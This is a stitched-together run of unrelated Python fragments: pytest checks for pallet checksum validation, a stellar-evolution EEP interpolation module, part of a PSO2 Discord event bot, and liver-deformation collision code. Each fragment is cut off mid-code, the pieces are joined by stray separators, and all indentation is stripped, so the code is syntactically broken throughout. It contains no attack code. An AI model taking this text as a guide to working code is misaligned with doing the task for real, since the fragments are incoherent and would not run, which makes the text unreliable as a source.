def test_pallet_invalid_sha1sum(self, host, create_pallet_isos, revert_export_stack_pallets):
minimal = f'{create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso'
result = host.run(f'stack add pallet {minimal} checksum="sha1:d25fd4ada1e1d5c2296831841d6e157644268530"')
assert result.rc != 0
assert "FAILED" in result.stderr
# ensure pallet is not added
result = host.run('stack list pallet minimal output-format=json')
assert result.rc != 0
def test_pallet_invalid_checksum(self, host, create_pallet_isos, revert_export_stack_pallets):
minimal = f'{create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso'
result = host.run(f'stack add pallet {minimal} checksum="fsum:d25fd4ada1e1d5c2296831841d6e157644268530"')
assert result.rc != 0
assert "Invalid checksum type(s) given" in result.stderr
assert "fsum" in result.stderr
def test_pallet_invalid_checksum_format(self, host, create_pallet_isos, revert_export_stack_pallets):
minimal = f'{create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso'
result = host.run(f'stack add pallet {minimal} checksum="sha1=d25fd4ada1e1d5c2296831841d6e157644268530"')
assert result.rc != 0
assert "You must supply a checksum in the format of <type>:<value>" in result.stderr
def test_pallet_invalid_checksums_when_multiple(self, host, run_pallet_isos_server, create_pallet_isos, revert_export_stack_pallets):
minimal = f'{create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso'
minimal_url = "http://127.0.0.1:8000/minimal-1.0-sles12.x86_64.disk1.iso"
result = host.run(
f'stack add pallet {minimal} {minimal_url} checksum="sha1:d25fd4ada1e1d5c2296831841d6e157644268530"')
assert result.rc != 0
assert "Checksum is required for each pallet." in result.stderr
def test_pallet_valid_checksum(self, host, create_pallet_isos, revert_export_stack_pallets, revert_pallet_hooks):
minimal = f'{create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso'
result = host.run(f'sha1sum {minimal}')
assert result.rc == 0
sha1sum = result.stdout.split(' ')[0]
result = host.run(f'stack add pallet {minimal} checksum="sha1:{sha1sum}"')
assert result.rc == 0
# ensure pallet is not added
result = host.run('stack list pallet minimal output-format=json')
assert result.rc == 0
def test_pallet_valid_checksum_url(self, host, run_pallet_isos_server, create_pallet_isos, revert_export_stack_pallets, revert_pallet_hooks):
minimal = f'{create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso'
result = host.run(f'sha1sum {minimal}')
assert result.rc == 0
sha1sum = result.stdout.split(' ')[0]
# ensure we're checking remote pallets
result | |
<gh_stars>10-100
'''
eep.py
Utilities to downsample stellar evolution tracks to Equivalent Evolutionary
Phase (EEP) basis, according to the method of Dotter (2016).
The default EEP functions are contained in eep.default_eep_functions. They are
default_eep_functions = {
'prems': get_PreMS,
'zams': get_ZAMS,
'eams': get_EAMS,
'iams': get_IAMS,
'tams': get_TAMS,
'rgbump': get_RGBump,
}
You can define and supply your own EEP functions in a dictionary.
EEP functions must have the call signature
function(track, eep_params)
where `track` is a single track.
'''
import numpy as np
import pandas as pd
from scipy.interpolate import interp1d
def _eep_interpolate(track, eep_params, eep_functions, metric_function=None):
'''
Given a raw evolutionary track, returns a downsampled track based on
Equivalent Evolutionary Phases (EEPs). The primary EEPs are defined below,
and the default ones to use in the computation are listed in
eep.default_eep_functions. The secondary EEPs are computed based on the
number of secondary EEPs between each pair of primary EEPs as specified
in `eep_params.intervals`; these should be defined in the grid
installation file. If one of the EEP_intervals is 200, then for that pair
of primary EEPs, the metric distance between those primary EEPs is divided
into 200 equally spaced points, and the relevant stellar parameters are
linearly interpolated at those points.
Parameters
----------
track (StarGrid): single-index StarGrid to be interpolated.
eep_params (dict): dictionary of column names to use in EEP computation,
as well as secondary EEP intervals.
eep_functions (dict): dictionary of callables to use for EEP computation.
metric_function (callable, optional): function to compute EEP intervals.
If none is specified, eep._HRD_distance will be used.
Returns
-------
eep_track, a pandas DataFrame containing the EEP-based track.
'''
i_eep = _locate_primary_eeps(track, eep_params, eep_functions)
num_intervals = len(i_eep) - 1
# In some cases, the raw models do not hit the ZAMS. In these cases,
# return None.
if num_intervals == 0:
return
if metric_function is None:
metric_function = _HRD_distance
# compute metric distance along track
dist = metric_function(track, eep_params)
primary_eep_dist = dist[i_eep]
eep_intervals = eep_params['intervals']
secondary_eep_dist = np.zeros(
sum(eep_intervals[:num_intervals]) + len(i_eep)
)
# Determine appropriate distance to each secondary EEP
j0 = 0
for i in range(num_intervals):
my_dist = primary_eep_dist[i+1] - primary_eep_dist[i]
delta = my_dist/(eep_intervals[i] + 1)
new_dist = np.array([primary_eep_dist[i] + delta*j \
for j in range(eep_intervals[i]+1)])
secondary_eep_dist[j0:j0+len(new_dist)] = new_dist
j0 += len(new_dist)
secondary_eep_dist[-1] = primary_eep_dist[-1]
# Create list of interpolator functions
interp = interp1d(dist, track.T)
# Interpolate stellar parameters along evolutionary track for
# desired EEP distances
eep_track = pd.DataFrame(interp(secondary_eep_dist).T, columns=track.columns)
eep_track.index.name = 'eep'
return eep_track
def _locate_primary_eeps(track, eep_params, eep_functions=None):
'''
Given a track, returns a list containing indices of Equivalent
Evolutionary Phases (EEPs)
'''
# define a list of functions to iterate over
eep_f = default_eep_functions
if eep_functions is None:
eep_functions = default_eep_functions
else:
eep_f.update(eep_functions)
# get indices of EEPs
i_eep = []
i_start = 0
for f in eep_f.values():
i_phase = f(track, eep_params, i0=i_start)
i_eep.append(i_phase)
i_start = i_phase
if i_start == -1:
return np.array(i_eep[:-1])
return np.array(i_eep)
def get_PreMS(track, eep_params, i0=0, logTc_crit=5.0):
'''
The pre-main sequence EEP is the point where central temperature rises
above a certain value (which must be lower than necessary for sustained
fusion). The default value is log10(T_c) = 5.0, but may be chosen to be
different. An optional argument i0 can be supplied, which is the
index to start with.
This relies on the behavior of pandas.Series.idxmax() for a Series
of bools. If no temperature is greater than or equal to logTc, the
natural return value is i0. So we don't mistake this failed search,
we must check the value at i0 to make sure it satisfies our criterion.
Returns
-------
`i_PreMS`: (int) index of the first element in track[i0: "logT(cen)"]
greater than logTc.
'''
log_central_temp = eep_params['log_central_temp']
logTc_tr = track.loc[i0:, log_central_temp]
i_PreMS = _first_true_index(logTc_tr >= logTc_crit)
return i_PreMS
def get_ZAMS(track, eep_params, i0=10, ZAMS_pref=3, Xc_burned=0.001,
Hlum_frac_max=0.999):
'''
The Zero-Age Main Sequence EEP has three different implementations in
Dotter's code:
ZAMS1) the point where the core hydrogen mass fraction has been depleted
by some fraction (0.001 by default: Xc <= Xmax - 0.001)
ZAMS2) the point *before ZAMS1* where the hydrogen-burning luminosity
achieves some fraction of the total luminosity
(0.999 by default: Hlum/lum = 0.999)
ZAMS3) the point *before ZAMS1* with the highest surface gravity
ZAMS3 is implemented by default.
'''
core_hydrogen_frac = eep_params['core_hydrogen_frac']
Xc_init = track.at[0, core_hydrogen_frac]
Xc_tr = track.loc[i0:, core_hydrogen_frac]
ZAMS1 = _first_true_index(Xc_tr <= Xc_init-Xc_burned)
if ZAMS1 == -1:
return -1
if ZAMS_pref == 1:
return ZAMS1
if ZAMS_pref == 2:
hydrogen_lum = eep_params['hydrogen_lum']
lum = eep_params['lum']
Hlum_tr = track.loc[i0:ZAMS1, hydrogen_lum]
lum_tr = track.loc[i0:ZAMS1, lum]
Hlum_frac = Hlum_tr/lum_tr
ZAMS2 = _first_true_index(Hlum_frac >= Hlum_frac_max)
if ZAMS2 == -1:
return ZAMS1
return ZAMS2
# or ZAMS_pref = 3
logg = eep_params['logg']
logg_tr = track.loc[0:ZAMS1, logg]
ZAMS3 = logg_tr.idxmax()
return ZAMS3
def get_IorT_AMS(track, eep_params, i0, Xmin):
'''
The Intermediate- and Terminal-Age Main Sequence (IAMS, TAMS) EEPs both use
the core hydrogen mass fraction dropping below some critical amount.
This function encapsulates the main part of the code, with the difference
between IAMS and TAMS being the value of Xmin.
'''
core_hydrogen_frac = eep_params['core_hydrogen_frac']
Xc_tr = track.loc[i0:, core_hydrogen_frac]
i_eep = _first_true_index(Xc_tr <= Xmin)
return i_eep
def get_EAMS(track, eep_params, i0=12, Xmin=0.55):
'''
Early-Age Main Sequence. Without this, the low-mass rotevol tracks do not
reach an EEP past the ZAMS before 15 Gyr.
'''
i_EAMS = get_IorT_AMS(track, eep_params, i0, Xmin)
return i_EAMS
def get_IAMS(track, eep_params, i0=12, Xmin=0.3):
'''
Intermediate-Age Main Sequence exists solely to ensure the convective
hook is sufficiently sampled.
Defined to be when the core hydrogen mass fraction drops below some
critical value. Default: Xc <= 0.3
'''
i_IAMS = get_IorT_AMS(track, eep_params, i0, Xmin)
return i_IAMS
def get_TAMS(track, eep_params, i0=14, Xmin=1e-12):
'''
Terminal-Age Main Sequence, defined to be when the core hydrogen mass
fraction drops below some critical value. Default: Xc <= 1e-12
'''
i_TAMS = get_IorT_AMS(track, eep_params, i0, Xmin)
return i_TAMS
def get_RGBump(track, eep_params, i0=None):
'''
The Red Giant Bump is an interruption in the increase in luminosity on the
Red Giant Branch. It occurs when the hydrogen-burning shell reaches the
composition discontinuity left from the first convective dredge-up.
Dotter skips the Red Giant Bump and proceeds to the Tip of the Red Giant
Branch, but since the YREC models, at the time of this writing, terminate
at the helium flash, I choose to use the Red Giant Bump as my final EEP.
I identify the RGBump as the first local minimum in Teff after the TAMS.
To avoid weird end-of-track artifacts, if the minimum is within 1 step
from the end of the raw track, the track is treated as if it doesn't reach
the RGBump.
Added 2018/07/22: Some tracks have weird, jumpy behavior before the RGBump
which gets mistakenly identified as the RGBump. To avoid this, I force the
RGBump to be the first local minimum in Teff after the TAMS *and* with
a luminosity above 10 Lsun.
'''
lum = eep_params['lum']
log_teff = eep_params['log_teff']
N = len(track)
lum_tr = track.loc[i0:, lum]
logT_tr = track.loc[i0:, log_teff]
RGBump = _first_true_index(lum_tr > 10) + 1
if RGBump == 0:
return -1
while logT_tr[RGBump] < logT_tr[RGBump-1] and RGBump < N-1:
RGBump += 1
# Two cases: 1) We didn't reach an extremum, in which case RGBump gets
# set as the final index of the track. In this case, return -1.
# 2) We found the extremum, in which case RGBump gets set
# as the index corresponding to the extremum.
if RGBump >= N-1:
return -1
return RGBump-1
def get_RGBTip(track, eep_params, i0=None):
'''
Red Giant Branch Tip
Dotter describes the tip of the red giant branch (RGBTip) EEP as
"the point at which stellar luminosity reaches a maximum---or the stellar
Teff reaches a minimum---after core H burning is complete but before core
He burning has progressed significantly."
Note that the YREC models at the time of this writing nominally end at
the helium flash, so the RGBTip is not recommended | |
quick access to the data without reading the csvs over and over again.
init_unit_data()
#Initializes the event calendar by pulling event data from SEGA's website.
#Sets the scheduler to update the calendar every 24 hours in case there are unannounced changes to the calendar
#Note: They retired scheduled events after New Genesis launched.
init_calendar()
notifier.add_job(init_calendar, 'interval', minutes=1440)
#Print something to the console so we know we passed the initialization stage
print(f'{client.user} has connected to Discord!')
#Set the bot's status message to "Playing PHANTASY STAR ONLINE 2"
await client.change_presence(activity=discord.Game(name="PHANTASY STAR ONLINE 2"))
#Loads all events that haven't started yet into the notification scheduler [the thing that messages event attendees 15 minutes before an event starts]
await loadAllEventNotifs()
#************** loadEvent() ****************
#loads event from database using the event ID, returns GuildEvent object
async def loadEvent(event_ID):
event = GuildEvent(None, None, None, None, None)
event.DBToEvent(event_ID)
#await event.listEventInfo()
return event
#************** notify() ****************
#Pulls event data from event ID, checks if the event is still posted in the guild [in case it got cancelled/deleted], grabs all the signups and notifies them that the event will start soon.
async def notify(event_ID):
event = await loadEvent(event_ID)
if event is None:
return
channels = event.guild.text_channels
for i in channels:
if(i.name) == ('event-hosting'):
event_channel = i
message = await event_channel.fetch_message(event_ID)
if message is None:
return
for player in event.playerList:
user = client.get_user(player)
await user.send("Hey there {}! This is just a reminder that you signed up for {} at {}. It will begin shortly :) ".format(user.display_name, event.eventName, event.guild))
#************** getEventName() ****************
#Prompts user for the event name with a fun dialogue
async def getEventName(ctx):
def eventNameCheck(m):
return m.author == ctx.author and m.channel == ctx.channel
try:
eventName = await client.wait_for('message', check=eventNameCheck, timeout=120)
if eventName is not None:
eventName.content = eventName.clean_content
eventName.content = discord.utils.escape_markdown(eventName.content)
except asyncio.TimeoutError:
await ctx.author.send("Oh crap, look at the time. I gotta go! Let's talk about this later okay?")
return "Timeout"
else:
if '/host' in eventName.content:
await ctx.author.send("{}.... More than one '/host' confuses me, I'm just one guy!".format(ctx.author.display_name))
if '/cancel' == eventName.content:
await ctx.author.send("What? You want to talk about this another time? Okay {}, I'll be ready for you :> ".format(ctx.author.display_name))
return None
if eventName.content is None:
await ctx.author.send("I completely zoned out {}, could you repeat that again?")
eventName = await getEventName(ctx)
if len(eventName.content) > 1500:
await ctx.author.send("Eeeeeeeeeeeh? Sorry {}! The event name was too long for me to remember. I got most of it down though!".format(ctx.author.display_name))
eventName.content = eventName.content[0:1500]
return eventName
#************** getPartyType() ****************
#Prompts user for the party size with a fun dialogue
async def getPartyType(ctx):
def partyTypeCheck(m):
return m.author == ctx.author and m.channel == ctx.channel
try:
partyType = await client.wait_for('message', check=partyTypeCheck, timeout=120)
except asyncio.TimeoutError:
await ctx.author.send("Oh crap! I'm late for class! Let's talk about this another time, okay? Bye {}!".format(ctx.author.display_name) )
return "Timeout"
else:
if '/host' in partyType.content:
await ctx.author.send("{}.... More than one '/host' confuses me, I'm just one guy!".format(ctx.author.display_name))
if '/cancel' == partyType.content:
await ctx.author.send("What? You want to talk about this another time? Okay {}, I'll be ready for you :> ".format(ctx.author.display_name))
return None
if partyType.content.lower() == 'four' or partyType.content == '4':
partyType.content = '4'
return partyType
elif partyType.content.lower() == 'eight' or partyType.content == '8':
partyType.content = '8'
return partyType
elif partyType.content.lower() == 'twelve' or partyType.content == '12':
partyType.content = '12'
return partyType
elif partyType.content.lower() == 'unlimited':
partyType.content = 'unlimited'
return partyType
else:
await ctx.author.send("No can do {}, parties can only be 'four' or '4' and multi-parties can only be 'eight', '8', 'twelve', '12' or 'unlimited'. Try again.".format(ctx.author.display_name))
partyType = await getPartyType(ctx)
return partyType
#************** getEventData() ****************
#Prompts user for the event date/time with a fun dialogue, will attempt to infer the date/time without a strict format
async def getEventDate(ctx):
def dateCheck(m):
return m.author == ctx.author and m.channel == ctx.channel
try:
date = await client.wait_for('message', check=dateCheck, timeout=120)
except asyncio.TimeoutError:
await ctx.author.send("Oh snap! My ride's here! See you later {}!".format(ctx.author.display_name))
return "Timeout"
else:
if '/host' in date.content:
await ctx.author.send("{}.... More than one '/host' confuses me, I'm just one guy!".format(ctx.author.display_name))
if '/cancel' == date.content:
await ctx.author.send("What? You want to talk about this another time? Okay {}, I'll be ready for you :> ".format(ctx.author.display_name))
return None
date = dateparser.parse(str(date.content))
if date is None:
await ctx.author.send("My bad {} 🙁. I couldn't understand the date and time. Can you try again for me? I'll try to do better 😫".format(ctx.author.display_name))
date = await getEventDate(ctx)
return date
#************** getMutualGuilds() ****************
#Scans to see what discord servers the bot has in common with the user, if there are no common servers - returns none because they can't host an event without sharing a server with the bot.
async def getMutualGuilds(ctx):
mutualGuilds = []
try:
for guild in client.guilds:
if(guild.get_member(ctx.author.id)):
mutualGuilds.append(guild)
return mutualGuilds
except:
return None
else:
return None
#************** getGuildSelection() ****************
#Prompts user for the discord server they'd like to host an event on with a fun dialogue, only activates if the hoshii shares more than one server with the user, will just default to one server if only one server is shared.
async def getGuildSelection(ctx):
def guildCheck(m):
return m.author == ctx.author and m.channel == ctx.channel
mutualGuilds = await getMutualGuilds(ctx)
if len(mutualGuilds) < 1:
await ctx.author.send("You don't share any servers with me {}, it's such a shame :(".format(ctx.author.display_name))
return None
elif len(mutualGuilds) == 1:
guild = mutualGuilds[0]
return guild
else:
try:
string = "Mmmn {}, can you tell me which alliance we're hosting this event for?".format(ctx.author.display_name)
for i in mutualGuilds:
string = string + "\n> *> {}*".format(i.name)
await ctx.author.send(string)
guild = await client.wait_for('message', check=guildCheck, timeout=120)
except asyncio.TimeoutError:
await ctx.author.send("What?! The alliance quarters is on fire?! Duty calls {}, we'll discuss this later!".format(ctx.author.display_name))
return "Timeout"
else:
if '/host' in guild.content:
await ctx.author.send("{}.... More than one '/host' confuses me, I'm just one guy!".format(ctx.author.display_name))
if '/cancel' == guild.content:
await ctx.author.send("What? You want to talk about this another time? Okay {}, I'll be ready for you :> ".format(ctx.author.display_name))
return None
similarity_ratios = {}
for i in mutualGuilds:
similarity_ratio = SequenceMatcher(None, guild.content, i.name).ratio()
similarity_ratios[i] = similarity_ratio
most_similar = max(similarity_ratios, key=similarity_ratios.get)
guild = most_similar
if guild is None:
await ctx.author.send("Sorry {}, I zoned out for a minute. HOSHII TIME TRAVEL MAGIC GO! **poof**".format(ctx.author.display_name))
guild = await getGuildSelection(ctx)
return guild
#************** updateuq() ****************
#This was a secret command to force a calendar update without rebooting hoshii
@client.command(hidden=True)
async def updateuq(ctx, *args):
init_calendar()
if ctx:
await ctx.author.send("Okay {}, I've updated the calendar for you!".format(ctx.author.display_name))
#************** back() ****************
#Returns a list of all back armor data currently stored on hoshii's dictionary. If an arg is sent, will scan for the closest match based on similarity ratio and give detailed stats on that armor piece.
@client.command(description='If there\'s no input, this command will return a list of all of the back units currently in Hoshii\'s dictionary. When given input, it will output the back unit\'s stats.\n\nUsage example: /back cleasis')
async def back(ctx, *args):
if len(args) < 1:
back_list = ''
for i in back_dict.keys():
back_list = back_list + i + '\n'
await ctx.send(back_list)
return
combined = ""
for i in args:
combined = combined + str(i+" ")
key = combined
keys = back_dict.keys()
ratios = {}
for i in keys:
similarity_ratio = SequenceMatcher(None, key, i).ratio()
ratios[i] = similarity_ratio
most_similar = max(ratios, key=ratios.get)
final_key = most_similar
response = "**{}**```\nMEL PWR: {}\nRNG PWR: {}\nTEC PWR: {}\nHP: {}\nPP: {}\n\nMEL DEF: {}\nRNG DEF: {}\nTEC DEF: {}\n\nMEL RES: {}\nRNG RES: {}\nTEC RES: {}\nLight RES: {}\nDark RES: {}\nFire RES: {}\nIce RES: {}\nLightning RES: {}\nWind RES: {}\n\nDEX: {}\n```".format(back_dict[final_key]['Unit'], back_dict[final_key]['MEL pwr'], back_dict[final_key]['RNG pwr'], back_dict[final_key]['TEC pwr'], back_dict[final_key]['HP'], back_dict[final_key]['PP'], back_dict[final_key]['M DEF'], back_dict[final_key]['R DEF'], back_dict[final_key]['T DEF'], back_dict[final_key]['M RES'], back_dict[final_key]['R RES'], back_dict[final_key]['T RES'], back_dict[final_key]['Light RES'], back_dict[final_key]['Dark RES'], back_dict[final_key]['Fire RES'], back_dict[final_key]['Ice RES'], back_dict[final_key]['Lightning RES'], back_dict[final_key]['Wind RES'], back_dict[final_key]['DEX'])
await ctx.send(response)
#************** arms() ****************
#Returns a list of all arm armor data currently stored on hoshii's dictionary. If an arg is sent, | |
<reponame>Kexin-Wei/spinnup
import os
import json
import numpy as np
import itertools
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d.art3d import Line3DCollection
from mpl_toolkits import mplot3d
def liver_dump_init(env, name = None):
liver = {'x':[],'Fes':[],'Fis':[],'Ficp':[],'volume':[],'col_p_n':[],'crash':[]}
liver['vtx'] = env.liver.x.copy()
if name is not None:
liver['name'] = name
else:
liver['name'] = f"_dt{env.timestep}_down_gm{env.liver.gamma}"
return liver
def liver_dump_step(liver,env):
liver['x'].append(env.liver.x)
liver['Fes'].append(env.liver.Fes)
liver['Fis'].append(env.liver.Fis)
liver['Ficp'].append(env.liver.Ficp)
liver['volume'].append(np.round(env.liver.volumes6.sum() / env.liver.init_volume6.sum(),3))
liver['col_p_n'].append(len(env.liver.check_tet_aabb_collision(env.sg.x)))
liver['crash'].append(env.liver.crash_flag)
return liver
def liver_dump(liver,ep = None):
liver_save ={}
liver_save['vtx'] = liver['vtx'].tolist()
liver_save['x'] = np.array(liver['x']).tolist()
liver_save['Fes'] = np.array(liver['Fes']).tolist()
liver_save['Fis'] = np.array(liver['Fis']).tolist()
liver_save['Ficp'] = np.array(liver['Ficp']).tolist()
liver_save['volume'] = np.array(liver['volume']).tolist()
liver_save['col_p_n']= np.array(liver['col_p_n']).tolist()
liver_save['crash'] = np.array(liver['crash']).tolist()
if ep is None:
with open(os.path.join('liver_json',f"liver_record{liver['name']}.json"),'w') as f:
json.dump(liver_save,f)
else:
with open(os.path.join('liver_json',f"liver_record_{int(ep)}.json"),'w') as f:
json.dump(liver_save,f)
def liver_dump_load(liver):
vtx = np.array(liver['vtx'])
x = np.array(liver['x'])
Fes = np.array(liver['Fes'])
Fis = np.array(liver['Fis'])
Ficp = np.array(liver['Ficp'])
volume = np.array(liver['volume'])
col_p_n = np.array(liver['col_p_n'])
crash = np.array(liver['crash'])
return vtx, x, Fes, Fis, Ficp, volume, col_p_n, crash
'''
temp:
1. collision_response_cotin
2. collision_response_self
'''
def collision_response_cotin(pair,liver,past_p,current_p):
# check bc_co for all surface tri_element
# add dn to decide
move_v_disp_dict = {}
move_tri_indexs = []
flat_list = [item for sublist in list(pair.values()) for item in sublist]
p_indexs = np.array(flat_list).reshape(-1)
p_n = p_indexs.shape[0]
ray = current_p[p_indexs]-past_p[p_indexs]
ray = ray*(1/np.linalg.norm(ray,axis=-1))[:,None] # p_n x3
# compute ray and normal vector, d= ray,n=normal_vec
dn = ray@liver.tri_normal_vec.T # p_n x n_tri
ap = liver.x[liver.tri_elements[:,0]][None,:] - past_p[p_indexs][:,None] # p_n x n_tri x 3 #choose first point as a
apn = (ap * liver.tri_normal_vec[None,:]).sum(axis=-1) # p_n x n_tri x 3 -> p_n x n_tri
ts = apn * (1/dn) # p_n x n_tri
int_p = ts[:,:,None]*ray[:,None]+past_p[p_indexs][:,None] # p_n x n_tri x3 <- p_n x n_tri x1 * p_n x1 x3 + p_n x1 x3
# compute barycentric coordinates of intersection points
v1 = liver.x[liver.tri_elements[:,1]]-liver.x[liver.tri_elements[:,0]] # n_tri x3
v2 = liver.x[liver.tri_elements[:,2]]-liver.x[liver.tri_elements[:,0]]
tri_areax2 = np.linalg.norm(np.cross(v1,v2,axis=-1),axis=-1) # n_tri
bc_temp = np.zeros((p_n,liver.n_tri,3,3,3))
bc_temp[:] = np.tile(liver.x[liver.tri_elements], 3).reshape(-1, 3, 3, 3).transpose(0, 2, 1, 3) # p_n x n_tri x 3area x 3ps x 3
for itemp in range(p_n):
bc_temp[itemp, :, [0, 1, 2], [0, 1, 2]] = int_p[itemp]
v1 = bc_temp[:, :, :, 1] - bc_temp[:, :, :, 0] # p_n x n_tri x 3area x 3xyz
v2 = bc_temp[:, :, :, 2] - bc_temp[:, :, :, 0]
areax2 = np.linalg.norm(np.cross(v1, v2, axis=-1), axis=-1) # p_n x n_tri x 3area
bc_co = areax2 * (1.0 / tri_areax2)[np.newaxis, :,
np.newaxis] # p_n x n_tri x 3area<- p_n x n_tri x 3area * 1 x n_tri x 3area
for itemp in range(p_n):
# check bc_co
check1 = np.argwhere(abs(bc_co[itemp].sum(axis=-1) - 1) < 1e-3).flatten() # each p should have at least 1
check2 = np.argwhere(dn[itemp] < 0).flatten()
psb_tri_index = np.intersect1d(check1,check2) # all possible tri_elements satisfies the bc_co and the negative normal vector
if psb_tri_index.size!=0:
psb_ts = ts[itemp,psb_tri_index] # n_psb_tri_index
# if np.any(psb_ts<0):
# raise ValueError("liver shape error")
move_tri_index = psb_tri_index[psb_ts.argmin()] # only 1 the tri_elements should move
move_t = current_p[p_indexs[itemp]] - int_p[itemp,move_tri_index]
move_v_index_p = liver.tri_elements[move_tri_index]
for ividx in move_v_index_p: # same points may move multiple times.
if ividx not in move_v_disp_dict.keys():
move_v_disp_dict[ividx] = move_t # move_t put in for new vindex
else:# compare move_t for old vindex
if np.linalg.norm(np.c_[move_v_disp_dict[ividx],move_t].T,axis=-1).argmax() == 1 : # older move closer than new
move_v_disp_dict[ividx] = move_t
move_tri_indexs.append(move_tri_index.tolist())
print(move_tri_indexs)
return move_v_disp_dict
def collision_response_self(pair, liver, tool):
# not so good when the deform is bigger
# change to old fixed to test, problem still, try cotin methods
new_vtx_delta = None
move_tris = {}
nv_aves = {}
new_vtx_deltas = {}
for key, value in pair.items():
new_vtx_delta = np.zeros(liver.x.shape)
i_tet, p_index = int(key), np.array(value)
p_n = p_index.shape[0]
# find potential collpaision surface tri_element
col_tri_index = np.argwhere(liver.tri_tet[:, 0] == i_tet).flatten()
if col_tri_index.size == 0: raise ValueError(
"Update time step too big, vertices skip the surface tetrahedron elements")
col_tri_n = col_tri_index.shape[0]
col_tri_nv = liver.tri_normal_vec[col_tri_index]
col_tri_p = liver.x[liver.tri_elements[col_tri_index].T[0]] # chose the first points
# compute nv_ave
nv_ave = tool.vtx_normal_vec[p_index].sum(axis=0)
nv_ave = nv_ave / np.linalg.norm(nv_ave)
nv_aves[key] = nv_ave
# compute ts and intersection points
dn = nv_ave.dot(col_tri_nv.T) # col_tri_n
ap = col_tri_p[np.newaxis, :] - tool.x[p_index, np.newaxis] # p_n x col_tri_n x 3
dotn = np.tile(col_tri_nv, p_n).reshape(-1, p_n, 3).transpose(1, 0, 2)
apn = (ap * dotn).sum(axis=-1) # p_n x col_tri_n
ts = apn * (1 / dn) # p_n x col_tri_n
int_col_p = ts[:, :, np.newaxis] * nv_ave[np.newaxis, np.newaxis, :] \
+ tool.vertices[p_index][:, np.newaxis, :] # p_n x col_tri_n x 1 * 1 x 1 x 3 + p_n x 1 x 3
# compute barycentric coordinates of intersection points
tri_vertices = liver.x[liver.tri_elements[col_tri_index]] # n_tri x 3 x 3
v1 = tri_vertices[:, 1] - tri_vertices[:, 0]
v2 = tri_vertices[:, 2] - tri_vertices[:, 0]
tri_areax2 = np.linalg.norm(np.cross(v1, v2, axis=-1), axis=-1) # n_tri
bc_temp = np.zeros((p_n, col_tri_n, 3, 3, 3))
bc_temp[:] = np.tile(tri_vertices, 3).reshape(-1, 3, 3, 3).transpose(0, 2, 1, 3) # p_n x col_tri_n x 3 x 3 x 3
for itemp in range(p_n):
bc_temp[itemp, :, [0, 1, 2], [0, 1, 2]] = int_col_p[itemp]
v1 = bc_temp[:, :, :, 1] - bc_temp[:, :, :, 0] # p_n x col_tri_n x 3area x 3xyz
v2 = bc_temp[:, :, :, 2] - bc_temp[:, :, :, 0]
areax2 = np.linalg.norm(np.cross(v1, v2, axis=-1), axis=-1) # p_n x col_tri_n x 3area
bc_co = areax2 * (1.0 / tri_areax2)[np.newaxis, :,
np.newaxis] # p_n x col_tri_n x 3area * 1 x col_tri_n x 3area = p_n x col_tri_n x 3area
# Move tri to point with tmax
check1 = np.argwhere(abs(bc_co.sum(axis=-1) - 1) < 1e-3)
check2 = np.argwhere(dn < 0)
inter_tri_index = np.intersect1d(check1[:, 1], check2) # find colliable surface tri_elements index
# no colliable tri_elements
if inter_tri_index.size == 0:
the_best_tri = dn.argmin() # chose one of most collidable tri
move_tri = liver.tri_elements[col_tri_index[the_best_tri]]
tri_nv = liver.tri_normal_vec[col_tri_index[the_best_tri]].flatten()
tri_vtx = liver.x[move_tri].reshape(3, 3)
v = nv_ave - tri_nv # find a new direction, not so sharp as nv_ave
v = v / np.linalg.norm(v)
dn_t = v.dot(tri_nv) # 1
ap_t = tri_vtx[0] - tool.x[p_index]
t_t = ap_t.dot(tri_nv) / dn_t
move_t = t_t.min()
new_vtx_delta[move_tri] += - move_t * v
new_vtx_deltas.setdefault(key, []).append(new_vtx_delta)
move_tris.setdefault(key, []).append(move_tri.flatten())
print(' None ',end='')
else:
# more than 1 colliable tri_elements
if len(inter_tri_index) > 1:
temp_delta = np.zeros((liver.x.shape[0], len(inter_tri_index))) # n_v * n_inter
itemp = 0
for inter_tri_i in inter_tri_index:
part_p_index = check1[ check1[:, 1] == inter_tri_i, 0] # p index of each tri_element that satisfies bc_co condition
move_t = ts[part_p_index, inter_tri_i].min()
move_tri = liver.tri_elements[col_tri_index[inter_tri_i]]
temp_delta[move_tri, itemp] = - move_t # collect all possible move_t for all vertices
move_tris.setdefault(key, []).append(move_tri.flatten())
itemp += 1
new_vtx_delta += temp_delta.max(axis=-1)[:, np.newaxis] * nv_ave[np.newaxis,:] # move with the maximal move_t
new_vtx_deltas.setdefault(key, []).append(new_vtx_delta)
print(' Multi ',end='')
else:
# only 1 colliable tri_elements
move_t = ts[:, inter_tri_index].min()
move_tri = liver.tri_elements[col_tri_index[inter_tri_index]]
new_vtx_delta[move_tri] += -move_t * nv_ave
new_vtx_deltas.setdefault(key, []).append(new_vtx_delta)
move_tris.setdefault(key, []).append(move_tri.flatten())
print(' Single ',end='')
return new_vtx_delta, move_tris, nv_aves, new_vtx_deltas
'''
static methods:
1. lame_param
2. tri_mid_vec
3. rotation_matrix
4. flatten_list
'''
def lame_param(E, v):
la = E * v / (1 + v) / (1 - 2 * v)
mu = E / 2 / (1 + v)
return la, mu
def tri_mid_vec(vertices, tri_elements):
tri_vtx = vertices[tri_elements]
tri_mid = tri_vtx.mean(axis=1)
tri_normal_vec = np.cross(tri_vtx[:, 1] - tri_vtx[:, 0], tri_vtx[:, 2] - tri_vtx[:, 0])
tri_normal_vec = tri_normal_vec * (1.0 / np.linalg.norm(tri_normal_vec, axis=1))[:, np.newaxis]
return tri_mid, tri_normal_vec
def rotation_matrix(deg,axis='x'):
rad = np.deg2rad(deg)
s,c = np.sin(rad),np.cos(rad)
if axis=='x':
return np.array([ 1, 0, 0,
0, c, -s,
0, s, c]).reshape(-1,3)
elif axis=='y':
return np.array([ c, 0, s,
0, 1, 0,
-s, 0, c]).reshape(-1,3)
elif axis=='z':
return np.array([ c, -s, 0,
s, c, 0,
0, 0, 1]).reshape(-1,3)
else:
return np.ones((3,3))
# def flatten_list(l):
# # not work well
# for el in l:
# if isinstance(el, Iterable) and not isinstance(el, (str, bytes)):
# return flatten_list(el)
# else:
# return el
'''
matplotlibe subplot
1. create_axs
2. draw_liver
3. draw_liver_tool
'''
